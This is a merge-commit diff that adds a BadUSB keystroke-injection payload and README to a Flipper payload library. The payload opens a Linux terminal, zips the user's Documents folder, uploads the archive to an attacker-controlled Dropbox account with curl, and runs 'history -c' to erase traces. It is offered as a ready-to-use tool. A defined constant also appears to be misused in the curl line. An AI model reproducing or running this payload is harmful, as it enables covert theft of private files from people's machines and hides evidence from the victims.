Merge pull request #148 from aleff-github/patch-15

Exfiltrate Linux Content With Dropbox

payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md

@@ -0,0 +1,32 @@
+# Exfiltrate Linux Content With Dropbox - BADUSB ✅
+
+A script used to take folder content on Linux Systems.
+
+**Category**: Exfiltration, Execution
+
+[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
+
+## Description
+
+A script used to take folder content on Linux Systems.
+
+Opens a shel, zip all zippable (R permission) content of the folder, send the zip into the dropbox folder, delete shell history.
+
+## Getting Started
+
+### Dependencies
+
+* Internet Connection
+* Linux System
+* * Terminal that can be opened by the shortcommand CTRL-ALT t
+* DropBox Account for the access token
+
+### Executing program
+
+* Plug in your device
+
+### Settings
+
+* Set your dropbox access token
+* Set the folder path interessed (i.e. /Documents)
+* Change (if you think that it is necessary) the delay of the zipping operation

payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/payload.txt

@@ -0,0 +1,49 @@
+REM ##########################################################
+REM #                                                        |
+REM # Title        : Exfiltrate Linux Content With Dropbox   |
+REM # Author       : Aleff                                   |
+REM # Version      : 1.0                                     |
+REM # Category     : Exfiltration                            |
+REM # Target       : Linux                                   |
+REM #                                                        |
+REM ##########################################################
+
+REM Requirements:
+REM     - Internet Connection
+REM     - Dropbox Account
+REM     - - DROPBOX_ACCESS_TOKEN
+
+REM Required: Set here your Dropbox access TOKEN
+DEFINE #TOKEN example
+DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+
+
+DEFAULT_DELAY 500
+CTRL-ALT t
+
+DELAY 2000
+STRINGLN ACCESS_TOKEN="#TOKEN"
+STRINGLN USER_NAME=$(whoami)
+STRINGLN path="/home/$USER_NAME/Documents"
+STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
+STRINGLN NAME="$RANDOM.zip"
+STRINGLN ZIP_PATH="$path/$NAME"
+
+REM The FOLDER that you want to zip, in this example you want to zip all Documents content
+STRINGLN FOLDER="/home/$USER_NAME/Documents/"
+
+REM Delay for zipping operation, it depends by computer power and folder directory
+DELAY 10000
+
+STRINGLN if [ -r "$FOLDER" ]; then
+STRINGLN zip -r "$ZIP_PATH" "$FOLDER" > /dev/null 2>&1
+STRINGLN else
+STRINGLN echo   ""
+STRINGLN fi
+
+STRINGLN DROPBOX_FOLDER="/$NAME"
+
+STRINGLN curl -X POST DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
+
+DELAY 2000
+STRINGLN history -c